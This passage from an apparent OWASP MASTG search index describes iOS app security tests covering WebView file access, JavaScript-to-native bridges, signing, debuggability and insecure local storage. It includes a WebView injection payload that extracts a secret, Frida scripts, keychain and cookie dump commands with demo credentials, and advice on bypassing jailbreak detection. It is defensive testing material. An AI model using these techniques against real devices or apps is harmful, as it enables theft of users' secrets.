If one or more of the above properties are activated, you should determine whether they are really necessary for the app to work properly.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#checking-telephone-number-detection","title":"Checking Telephone Number Detection","text":"In Safari on iOS, telephone number detection is on by default. However, you might want to turn it off if your HTML page contains numbers that can be interpreted as phone numbers, but are not phone numbers, or to prevent the DOM document from being modified when parsed by the browser. To turn off telephone number detection in Safari on iOS, use the format-detection meta tag (<meta name = \"format-detection\" content = \"telephone=no\">
). An example of this can be found in the Apple developer documentation. Phone links should be then used (e.g. <a href=\"tel:1-408-555-5555\">1-408-555-5555</a>
) to explicitly create a link.
If it's possible to load local files via a WebView, the app might be vulnerable to directory traversal attacks. This would allow access to all files within the sandbox or even to escape the sandbox with full access to the file system (if the device is jailbroken). It should therefore be verified if a user can change the filename or path from which the file is loaded, and they shouldn't be able to edit the loaded file.
To simulate an attack, you may inject your own JavaScript into the WebView with an interception proxy or simply by using dynamic instrumentation. Attempt to access local storage and any native methods and properties that might be exposed to the JavaScript context.
In a real-world scenario, JavaScript can only be injected through a permanent backend Cross-Site Scripting vulnerability or a MITM attack. See the OWASP XSS Prevention Cheat Sheet and the chapter \"iOS Network Communication\" for more information.
For what concerns this section we will learn about:
As we have seen above in \"Testing How WebViews are Loaded\", if \"scenario 2\" of the WKWebViews is loaded, the app will do so by calling URLForResource:withExtension:
and loadHTMLString:baseURL
.
To quickly inspect this, you can use frida-trace and trace all \"loadHTMLString\" and \"URLForResource:withExtension:\" methods.
$ frida-trace -U \"Where's My Browser?\"\n -m \"*[WKWebView *loadHTMLString*]\" -m \"*[* URLForResource:withExtension:]\"\n\n 14131 ms -[NSBundle URLForResource:0x1c0255390 withExtension:0x0]\n 14131 ms URLForResource: web/WKWebView/scenario2.html\n 14131 ms withExtension: 0x0\n 14190 ms -[WKWebView loadHTMLString:0x1c0255390 baseURL:0x0]\n 14190 ms HTMLString: <!DOCTYPE html>\n <html>\n ...\n </html>\n\n 14190 ms baseURL: nil\n
In this case, baseURL
is set to nil
, meaning that the effective origin is \"null\". You can obtain the effective origin by running window.origin
from the JavaScript of the page (this app has an exploitation helper that allows to write and run JavaScript, but you could also implement a MITM or simply use Frida to inject JavaScript, e.g. via evaluateJavaScript:completionHandler
of WKWebView
).
As an additional note regarding UIWebView
s, if you retrieve the effective origin from a UIWebView
where baseURL
is also set to nil
you will see that it is not set to \"null\", instead you'll obtain something similar to the following:
applewebdata://5361016c-f4a0-4305-816b-65411fc1d780\n
This origin \"applewebdata://\" is similar to the \"file://\" origin as it does not implement Same-Origin Policy and allows access to local files and any web resources. In this case, it would be better to set baseURL
to \"about:blank\", this way, the Same-Origin Policy would prevent cross-origin access. However, the recommendation here is to completely avoid using UIWebView
s and go for WKWebView
s instead.
Even if not having the original source code, you can quickly determine if the app's WebViews do allow file access and which kind. For this, simply navigate to the target WebView in the app and inspect all its instances, for each of them get the values mentioned in the static analysis, that is, allowFileAccessFromFileURLs
and allowUniversalAccessFromFileURLs
. This only applies to WKWebView
s (UIWebVIew
s always allow file access).
We continue with our example using the \"Where's My Browser?\" app and Frida REPL, extend the script with the following content:
ObjC.choose(ObjC.classes['WKWebView'], {\n onMatch: function (wk) {\n console.log('onMatch: ', wk);\n console.log('URL: ', wk.URL().toString());\n console.log('javaScriptEnabled: ', wk.configuration().preferences().javaScriptEnabled());\n console.log('allowFileAccessFromFileURLs: ',\n wk.configuration().preferences().valueForKey_('allowFileAccessFromFileURLs').toString());\n console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString());\n console.log('allowUniversalAccessFromFileURLs: ',\n wk.configuration().valueForKey_('allowUniversalAccessFromFileURLs').toString());\n },\n onComplete: function () {\n console.log('done for WKWebView!');\n }\n});\n
If you run it now, you'll have all the information you need:
$ frida -U -f com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js\n\nonMatch: <WKWebView: 0x1508b1200; frame = (0 0; 320 393); layer = <CALayer: 0x1c4238f20>>\nURL: file:///var/mobile/Containers/Data/Application/A654D169-1DB7-429C-9DB9-A871389A8BAA/\n Library/WKWebView/scenario1.html\njavaScriptEnabled: true\nallowFileAccessFromFileURLs: 0\nhasOnlySecureContent: false\nallowUniversalAccessFromFileURLs: 0\n
Both allowFileAccessFromFileURLs
and allowUniversalAccessFromFileURLs
are set to \"0\", meaning that they are disabled. In this app we can go to the WebView configuration and enable allowFileAccessFromFileURLs
. If we do so and re-run the script we will see how it is set to \"1\" this time:
$ frida -U -f com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js\n...\n\nallowFileAccessFromFileURLs: 1\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/","title":"Determining Whether Native Methods Are Exposed Through WebViews","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#testing-uiwebview-javascript-to-native-bridges","title":"Testing UIWebView JavaScript to Native Bridges","text":"Search for code that maps native objects to the JSContext
associated with a WebView and analyze what functionality it exposes, for example no sensitive data should be accessible and exposed to WebViews.
In Objective-C, the JSContext
associated with a UIWebView
is obtained as follows:
[webView valueForKeyPath:@\"documentView.webView.mainFrame.javaScriptContext\"]\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#testing-wkwebview-javascript-to-native-bridges","title":"Testing WKWebView JavaScript to Native Bridges","text":"Verify if a JavaScript to native bridge exists by searching for WKScriptMessageHandler
and check all exposed methods. Then verify how the methods are called.
The following example from \"Where's My Browser?\" demonstrates this.
First we see how the JavaScript bridge is enabled:
func enableJavaScriptBridge(_ enabled: Bool) {\n options_dict[\"javaScriptBridge\"]?.value = enabled\n let userContentController = wkWebViewConfiguration.userContentController\n userContentController.removeScriptMessageHandler(forName: \"javaScriptBridge\")\n\n if enabled {\n let javaScriptBridgeMessageHandler = JavaScriptBridgeMessageHandler()\n userContentController.add(javaScriptBridgeMessageHandler, name: \"javaScriptBridge\")\n }\n}\n
Adding a script message handler with name \"name\"
(or \"javaScriptBridge\"
in the example above) causes the JavaScript function window.webkit.messageHandlers.myJavaScriptMessageHandler.postMessage
to be defined in all frames in all web views that use the user content controller. It can be then used from the HTML file like this:
function invokeNativeOperation() {\n value1 = document.getElementById(\"value1\").value\n value2 = document.getElementById(\"value2\").value\n window.webkit.messageHandlers.javaScriptBridge.postMessage([\"multiplyNumbers\", value1, value2]);\n}\n
The called function resides in JavaScriptBridgeMessageHandler.swift
:
class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler {\n\n//...\n\ncase \"multiplyNumbers\":\n\n let arg1 = Double(messageArray[1])!\n let arg2 = Double(messageArray[2])!\n result = String(arg1 * arg2)\n//...\n\nlet javaScriptCallBack = \"javascriptBridgeCallBack('\\(functionFromJS)','\\(result)')\"\nmessage.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil)\n
The problem here is that the JavaScriptBridgeMessageHandler
not only contains that function, it also exposes a sensitive function:
case \"getSecret\":\n result = \"XSRSOGKC342\"\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#dynamic-analysis","title":"Dynamic Analysis","text":"At this point you've surely identified all potentially interesting WebViews in the iOS app and got an overview of the potential attack surface (via static analysis, the dynamic analysis techniques that we have seen in previous sections or a combination of them). This would include HTML and JavaScript files, usage of the JSContext
/ JSExport
for UIWebView
and WKScriptMessageHandler
for WKWebView
, as well as which functions are exposed and present in a WebView.
Further dynamic analysis can help you exploit those functions and get sensitive data that they might be exposing. As we have seen in the static analysis, in the previous example it was trivial to get the secret value by performing reverse engineering (the secret value was found in plain text inside the source code) but imagine that the exposed function retrieves the secret from secure storage. In this case, only dynamic analysis and exploitation would help.
The procedure for exploiting the functions starts with producing a JavaScript payload and injecting it into the file that the app is requesting. The injection can be accomplished via various techniques, for example:
stringByEvaluatingJavaScriptFromString:
for UIWebView
and evaluateJavaScript:completionHandler:
for WKWebView
).In order to get the secret from the previous example of the \"Where's My Browser?\" app, you can use one of these techniques to inject the following payload that will reveal the secret by writing it to the \"result\" field of the WebView:
function javascriptBridgeCallBack(name, value) {\n document.getElementById(\"result\").innerHTML=value;\n};\nwindow.webkit.messageHandlers.javaScriptBridge.postMessage([\"getSecret\"]);\n
Of course, you may also use the Exploitation Helper it provides:
See another example for a vulnerable iOS app and function that is exposed to a WebView in [#thiel2] page 156.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/","title":"Making Sure that the App Is Properly Signed","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/#static-analysis","title":"Static Analysis","text":"You have to ensure that the app is using the latest code signature format. You can retrieve the signing certificate information from the application's .app file with codesign. Codesign is used to create, check, and display code signatures, as well as inquire into the dynamic status of signed code in the system.
After you get the application's IPA file, re-save it as a ZIP file and decompress the ZIP file. Navigate to the Payload directory, where the application's .app file will be.
Execute the following codesign
command to display the signing information:
$ codesign -dvvv YOURAPP.app\nExecutable=/Users/Documents/YOURAPP/Payload/YOURAPP.app/YOURNAME\nIdentifier=com.example.example\nFormat=app bundle with Mach-O universal (armv7 arm64)\nCodeDirectory v=20200 size=154808 flags=0x0(none) hashes=4830+5 location=embedded\nHash type=sha256 size=32\nCandidateCDHash sha1=455758418a5f6a878bb8fdb709ccfca52c0b5b9e\nCandidateCDHash sha256=fd44efd7d03fb03563b90037f92b6ffff3270c46\nHash choices=sha1,sha256\nCDHash=fd44efd7d03fb03563b90037f92b6ffff3270c46\nSignature size=4678\nAuthority=iPhone Distribution: Example Ltd\nAuthority=Apple Worldwide Developer Relations Certification Authority\nAuthority=Apple Root CA\nSigned Time=4 Aug 2017, 12:42:52\nInfo.plist entries=66\nTeamIdentifier=8LAMR92KJ8\nSealed Resources version=2 rules=12 files=1410\nInternal requirements count=1 size=176\n
There are various ways to distribute your app as described at the Apple documentation, which include using the App Store or via Apple Business Manager for custom or in-house distribution. In case of an in-house distribution scheme, make sure that no ad hoc certificates are used when the app is signed for distribution.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/","title":"Testing whether the App is Debuggable","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#static-analysis","title":"Static Analysis","text":"Inspect the app entitlements and check the value of get-task-allow
key. If it is set to true
, the app is debuggable.
Using codesign:
$ codesign -d --entitlements - iGoat-Swift.app\n\nExecutable=/Users/owasp/iGoat-Swift/Payload/iGoat-Swift.app/iGoat-Swift\n[Dict]\n [Key] application-identifier\n [Value]\n [String] TNAJ496RHB.OWASP.iGoat-Swift\n [Key] com.apple.developer.team-identifier\n [Value]\n [String] TNAJ496RHB\n [Key] get-task-allow\n [Value]\n [Bool] true\n [Key] keychain-access-groups\n [Value]\n [Array]\n [String] TNAJ496RHB.OWASP.iGoat-Swift\n````\n\nUsing ldid:\n\n```xml\n$ ldid -e iGoat-Swift.app/iGoat-Swift\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>application-identifier</key>\n <string>TNAJ496RHB.OWASP.iGoat-Swift</string>\n <key>com.apple.developer.team-identifier</key>\n <string>TNAJ496RHB</string>\n <key>get-task-allow</key>\n <true/>\n <key>keychain-access-groups</key>\n <array>\n <string>TNAJ496RHB.OWASP.iGoat-Swift</string>\n </array>\n</dict>\n</plist>\n
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#dynamic-analysis","title":"Dynamic Analysis","text":"Check whether you can attach a debugger directly, using Xcode. Next, check if you can debug the app on a jailbroken device after Clutching it. This is done using the debug-server which comes from the BigBoss repository at Cydia.
Note: if the application is equipped with anti-reverse engineering controls, then the debugger can be detected and stopped.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/","title":"Testing for Debugging Symbols","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/#static-analysis","title":"Static Analysis","text":"To verify the existence of debug symbols you can use objdump from binutils or llvm-objdump to inspect all of the app binaries.
In the following snippet we run objdump over TargetApp
(the iOS main app executable) to show the typical output of a binary containing debug symbols which are marked with the d
(debug) flag. Check the objdump man page for information about various other symbol flag characters.
$ objdump --syms TargetApp\n\n0000000100007dc8 l d *UND* -[ViewController handleSubmitButton:]\n000000010000809c l d *UND* -[ViewController touchesBegan:withEvent:]\n0000000100008158 l d *UND* -[ViewController viewDidLoad]\n...\n000000010000916c l d *UND* _disable_gdb\n00000001000091d8 l d *UND* _detect_injected_dylds\n00000001000092a4 l d *UND* _isDebugged\n...\n
To prevent the inclusion of debug symbols, set Strip Debug Symbols During Copy
to YES
via the XCode project's build settings. Stripping debugging symbols will not only reduce the size of the binary but also increase the difficulty of reverse engineering.
Dynamic analysis is not applicable for finding debugging symbols.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/","title":"Testing for Debugging Code and Verbose Error Logging","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#static-analysis","title":"Static Analysis","text":"You can take the following static analysis approach for the logging statements:
NSLog
, println
, print
, dump
, debugPrint
.#ifdef DEBUG\n // Debug-only code\n#endif\n
The procedure for enabling this behavior in Swift has changed: you need to either set environment variables in your scheme or set them as custom flags in the target's build settings. Please note that the following functions (which allow you to determine whether the app was built in the Swift 2.1. release-configuration) aren't recommended, as Xcode 8 and Swift 3 don't support these functions:
_isDebugAssertConfiguration
_isReleaseAssertConfiguration
_isFastAssertConfiguration
.Depending on the application's setup, there may be more logging functions. For example, when CocoaLumberjack is used, static analysis is a bit different.
For the \"debug-management\" code (which is built-in): inspect the storyboards to see whether there are any flows and/or view-controllers that provide functionality different from the functionality the application should support. This functionality can be anything from debug views to printed error messages, from custom stub-response configurations to logs written to files on the application's file system or a remote server.
As a developer, incorporating debug statements into your application's debug version should not be a problem as long as you make sure that the debug statements are never present in the application's release version.
In Objective-C, developers can use preprocessor macros to filter out debug code:
#ifdef DEBUG\n // Debug-only code\n#endif\n
In Swift 2 (with Xcode 7), you have to set custom compiler flags for every target, and compiler flags have to start with \"-D\". So you can use the following annotations when the debug flag DMSTG-DEBUG
is set:
#if MSTG-DEBUG\n // Debug-only code\n#endif\n
In Swift 3 (with Xcode 8), you can set Active Compilation Conditions in Build settings/Swift compiler - Custom flags. Instead of a preprocessor, Swift 3 uses conditional compilation blocks based on the defined conditions:
#if DEBUG_LOGGING\n // Debug-only code\n#endif\n
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#dynamic-analysis","title":"Dynamic Analysis","text":"Dynamic analysis should be executed on both a simulator and a device because developers sometimes use target-based functions (instead of functions based on a release/debug-mode) to execute the debugging code.
For the other \"manager-based\" debug code: click through the application on both a simulator and a device to see if you can find any functionality that allows an app's profiles to be pre-set, allows the actual server to be selected or allows responses from the API to be selected.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0088/","title":"Testing Jailbreak Detection","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0088/#overview","title":"Overview","text":"To test for jailbreak detection install the app on a jailbroken device.
Launch the app and see what happens:
If it implements jailbreak detection, you might notice one of the following things:
Note that crashes might be an indicator of jailbreak detection, but the app may be crashing for other reasons, e.g. it may have a bug. We recommend testing the app on a non-jailbroken device first, especially when you're testing preproduction versions.
Launch the app and try to bypass Jailbreak Detection using an automated tool:
If it implements jailbreak detection, you might be able to see indicators of that in the output of the tool. See section \"Automated Jailbreak Detection Bypass\".
Reverse Engineer the app:
The app might be using techniques that are not implemented in the automated tools that you've used. If that's the case you must reverse engineer the app to find proofs. See section \"Manual Jailbreak Detection Bypass\".
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0089/","title":"Testing Anti-Debugging Detection","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0089/#overview","title":"Overview","text":"In order to test for anti-debugging detection you can try to attach a debugger to the app and see what happens.
The app should respond in some way. For example by:
Try to hook or reverse engineer the app using the methods from section \"Anti-Debugging Detection\".
Next, work on bypassing the detection and answer the following questions:
Application Source Code Integrity Checks:
Run the app on the device in an unmodified state and make sure that everything works. Then apply patches to the executable using optool, re-sign the app as described in the chapter \"iOS Tampering and Reverse Engineering\", and run it.
The app should respond in some way. For example by:
Work on bypassing the defenses and answer the following questions:
File Storage Integrity Checks:
Go to the app data directories as indicated in section \"Accessing App Data Directories\" and modify some files.
Next, work on bypassing the defenses and answer the following questions:
Launch the app with various reverse engineering tools and frameworks installed on your test device, such as Frida, Cydia Substrate, Cycript or SSL Kill Switch.
The app should respond in some way to the presence of those tools. For example by:
Next, work on bypassing the detection of the reverse engineering tools and answer the following questions:
In order to test for emulator detection you can try to run the app on different emulators as indicated in section \"Emulator Detection\" and see what happens.
The app should respond in some way. For example by:
You can also reverse engineer the app using ideas for strings and methods from section \"Emulator Detection\".
Next, work on bypassing this detection and answer the following questions:
Attempt to disassemble the Mach-O in the IPA and any included library files in the \"Frameworks\" directory (.dylib or .framework files), and perform static analysis. At the very least, the app's core functionality (i.e., the functionality meant to be obfuscated) shouldn't be easily discerned. Verify that:
For a more detailed assessment, you need a detailed understanding of the relevant threats and the obfuscation methods used.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/","title":"Testing Local Data Storage","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#overview","title":"Overview","text":"This test case focuses on identifying potentially sensitive data stored by an application and verifying if it is securely stored. The following checks should be performed:
NSUserDefaults
, databases, KeyChain, Internal Storage, External Storage, etc.NOTE: For MASVS L1 compliance, it is sufficient to store data unencrypted in the application's internal storage directory (sandbox). For L2 compliance, additional encryption is required using cryptographic keys securely managed in the iOS KeyChain. This includes using envelope encryption (DEK+KEK) or equivalent methods.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#static-analysis","title":"Static Analysis","text":"When you have access to the source code of an iOS app, identify sensitive data that's saved and processed throughout the app. This includes passwords, secret keys, and personally identifiable information (PII), but it may as well include other data identified as sensitive by industry regulations, laws, and company policies. Look for this data being saved via any of the local storage APIs listed below.
Make sure that sensitive data is never stored without appropriate protection. For example, authentication tokens should not be saved in NSUserDefaults
without additional encryption. Also avoid storing encryption keys in .plist
files, hardcoded as strings in code, or generated using a predictable obfuscation function or key derivation function based on stable attributes.
Sensitive data should be stored by using the Keychain API (that stores them inside the Secure Enclave), or stored encrypted using envelope encryption. Envelope encryption, or key wrapping, is a cryptographic construct that uses symmetric encryption to encapsulate key material. Data encryption keys (DEK) can be encrypted with key encryption keys (KEK) which must be securely stored in the Keychain. Encrypted DEK can be stored in NSUserDefaults
or written in files. When required, application reads KEK, then decrypts DEK. Refer to OWASP Cryptographic Storage Cheat Sheet to learn more about encrypting cryptographic keys.
The encryption must be implemented so that the secret key is stored in the Keychain with secure settings, ideally kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
. This ensures the usage of hardware-backed storage mechanisms. Make sure that the AccessControlFlags
are set according to the security policy of the keys in the KeyChain.
Generic examples of using the KeyChain to store, update, and delete data can be found in the official Apple documentation. The official Apple documentation also includes an example of using Touch ID and passcode protected keys.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#filesystem","title":"Filesystem","text":"Using the source code, examine the different APIs used to store data locally. Make sure that any data is properly encrypted based on its sensitivity.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis","title":"Dynamic Analysis","text":"One way to determine whether sensitive information (like credentials and keys) is stored insecurely without leveraging native iOS functions is to analyze the app's data directory. Triggering all app functionality before the data is analyzed is important because the app may store sensitive data only after specific functionality has been triggered. You can then perform static analysis for the data dump according to generic keywords and app-specific data.
The following steps can be used to determine how the application stores data locally on a jailbroken iOS device:
/var/mobile/Containers/Data/Application/$APP_ID/
grep -iRn \"USERID\"
.You can analyze the app's data directory on a non-jailbroken iOS device by using third-party applications, such as iMazing.
$APP_NAME.imazing
. Rename it to $APP_NAME.zip
.Note that tools like iMazing don't copy data directly from the device. They try to extract data from the backups they create. Therefore, getting all the app data that's stored on the iOS device is impossible: not all folders are included in backups. Use a jailbroken device or repackage the app with Frida and use a tool like objection to access all the data and files.
If you added the Frida library to the app and repackaged it as described in \"Dynamic Analysis on Non-Jailbroken Devices\" (from the \"Tampering and Reverse Engineering on iOS\" chapter), you can use objection to transfer files directly from the app's data directory or read files in objection as explained in the chapter \"Basic Security Testing on iOS\", section \"Host-Device Data Transfer\".
The Keychain contents can be dumped during dynamic analysis. On a jailbroken device, you can use Keychain dumper as described in the chapter \"Basic Security Testing on iOS\".
The path to the Keychain file is
/private/var/Keychains/keychain-2.db\n
On a non-jailbroken device, you can use objection to dump the Keychain items created and stored by the app.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis-with-xcode-and-ios-simulator","title":"Dynamic Analysis with Xcode and iOS simulator","text":"This test is only available on macOS, as Xcode and the iOS simulator is needed.
For testing the local storage and verifying what data is stored within it, it's not mandatory to have an iOS device. With access to the source code and Xcode, the app can be built and deployed in the iOS simulator. The file system of the current device of the iOS simulator is available in ~/Library/Developer/CoreSimulator/Devices
.
Once the app is running in the iOS simulator, you can navigate to the directory of the latest simulator started with the following command:
$ cd ~/Library/Developer/CoreSimulator/Devices/$(\nls -alht ~/Library/Developer/CoreSimulator/Devices | head -n 2 |\nawk '{print $9}' | sed -n '1!p')/data/Containers/Data/Application\n
The command above will automatically find the UUID of the latest simulator started. Now you still need to grep for your app name or a keyword in your app. This will show you the UUID of the app.
grep -iRn keyword .\n
Then you can monitor and verify the changes in the filesystem of the app and investigate if any sensitive information is stored within the files while using the app.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis-with-objection","title":"Dynamic Analysis with Objection","text":"You can use the objection runtime mobile exploration toolkit to find vulnerabilities caused by the application's data storage mechanism. Objection can be used without a Jailbroken device, but it will require patching the iOS Application.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#reading-the-keychain","title":"Reading the Keychain","text":"To use Objection to read the Keychain, execute the following command:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios keychain dump\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------------- ------------------------------------------------------------- ------------------------------------\n2020-02-11 13:26:52 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.DVIAswiftv2.develop mysecretpass123\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-binary-cookies","title":"Searching for Binary Cookies","text":"iOS applications often store binary cookie files in the application sandbox. Cookies are binary files containing cookie data for application WebViews. You can use objection to convert these files to a JSON format and inspect the data.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json\n[\n {\n \"domain\": \"highaltitudehacks.com\",\n \"expiresDate\": \"2051-09-15 07:46:43 +0000\",\n \"isHTTPOnly\": \"false\",\n \"isSecure\": \"false\",\n \"name\": \"username\",\n \"path\": \"/\",\n \"value\": \"admin123\",\n \"version\": \"0\"\n }\n]\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-property-list-files","title":"Searching for Property List Files","text":"iOS applications often store data in property list (plist) files that are stored in both the application sandbox and the IPA package. Sometimes these files contain sensitive information, such as usernames and passwords; therefore, the contents of these files should be inspected during iOS assessments. Use the ios plist cat plistFileName.plist
command to inspect the plist file.
To find the file userInfo.plist, use the env
command. It will print out the locations of the application's Library, Caches, and Documents directories:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # env\nName Path\n----------------- -------------------------------------------------------------------------------------------\nBundlePath /private/var/containers/Bundle/Application/B2C8E457-1F0C-4DB1-8C39-04ACBFFEE7C8/DVIA-v2.app\nCachesDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Caches\nDocumentDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Documents\nLibraryDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library\n
Go to the Documents directory and list all files using ls
.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ls\nNSFileType Perms NSFileProtection Read Write Owner Group Size Creation Name\n------------ ------- ------------------------------------ ------ ------- ------------ ------------ -------- ------------------------- ------------------------\nDirectory 493 n/a True True mobile (501) mobile (501) 192.0 B 2020-02-12 07:03:51 +0000 default.realm.management\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 16.0 KiB 2020-02-12 07:03:51 +0000 default.realm\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 1.2 KiB 2020-02-12 07:03:51 +0000 default.realm.lock\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 284.0 B 2020-05-29 18:15:23 +0000 userInfo.plist\nUnknown 384 n/a True True mobile (501) mobile (501) 0.0 B 2020-02-12 07:03:51 +0000 default.realm.note\n\nReadable: True Writable: True\n
Execute the ios plist cat
command to inspect the content of userInfo.plist file.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios plist cat userInfo.plist\n{\n password = password123;\n username = userName;\n}\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-sqlite-databases","title":"Searching for SQLite Databases","text":"iOS applications typically use SQLite databases to store data required by the application. Testers should check the data protection values of these files and their contents for sensitive data. Objection contains a module to interact with SQLite databases. It allows you to dump the schema and tables and to query the records.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # sqlite connect Model.sqlite\nCaching local copy of database file...\nDownloading /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Application Support/Model.sqlite to /var/folders/4m/dsg0mq_17g39g473z0996r7m0000gq/T/tmpdr_7rvxi.sqlite\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Application Support/Model.sqlite to /var/folders/4m/dsg0mq_17g39g473z0996r7m0000gq/T/tmpdr_7rvxi.sqlite\nValidating SQLite database format\nConnected to SQLite database at: Model.sqlite\n\nSQLite @ Model.sqlite > .tables\n+--------------+\n| name |\n+--------------+\n| ZUSER |\n| Z_METADATA |\n| Z_MODELCACHE |\n| Z_PRIMARYKEY |\n+--------------+\nTime: 0.013s\n\nSQLite @ Model.sqlite > select * from Z_PRIMARYKEY\n+-------+--------+---------+-------+\n| Z_ENT | Z_NAME | Z_SUPER | Z_MAX |\n+-------+--------+---------+-------+\n| 1 | User | 0 | 0 |\n+-------+--------+---------+-------+\n1 row in set\nTime: 0.013s\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-cache-databases","title":"Searching for Cache Databases","text":"By default NSURLSession stores data, such as HTTP requests and responses in the Cache.db database. This database can contain sensitive data, if tokens, usernames or any other sensitive information has been cached. To find the cached information open the data directory of the app (/var/mobile/Containers/Data/Application/<UUID>
) and go to /Library/Caches/<Bundle Identifier>
. The WebKit cache is also being stored in the Cache.db file. Objection can open and interact with the database with the command sqlite connect Cache.db
, as it is a normal SQLite database.
It is recommended to disable caching of this data, as it may contain sensitive information in the request or response. The following list shows different ways of achieving this:
removeAllCachedResponses
You can call this method as follows:URLCache.shared.removeAllCachedResponses()
This method will remove all cached requests and responses from Cache.db file.
Apple documentation:
An ephemeral session configuration object is similar to a default session configuration (see default), except that the corresponding session object doesn\u2019t store caches, credential stores, or any session-related data to disk. Instead, session-related data is stored in RAM. The only time an ephemeral session writes data to disk is when you tell it to write the contents of a URL to a file.
Use the following keywords to check the app's source code for predefined and custom logging statements:
A generalized approach to this issue is to use a define to enable NSLog
statements for development and debugging, then disable them before shipping the software. You can do this by adding the following code to the appropriate PREFIX_HEADER (*.pch) file:
#ifdef DEBUG\n# define NSLog(...) NSLog(__VA_ARGS__)\n#else\n# define NSLog(...)\n#endif\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0053/#dynamic-analysis","title":"Dynamic Analysis","text":"In the section \"Monitoring System Logs\" of the chapter \"iOS Basic Security Testing\" various methods for checking the device logs are explained. Navigate to a screen that displays input fields that take sensitive user information.
After starting one of the methods, fill in the input fields. If sensitive data is displayed in the output, the app fails this test.
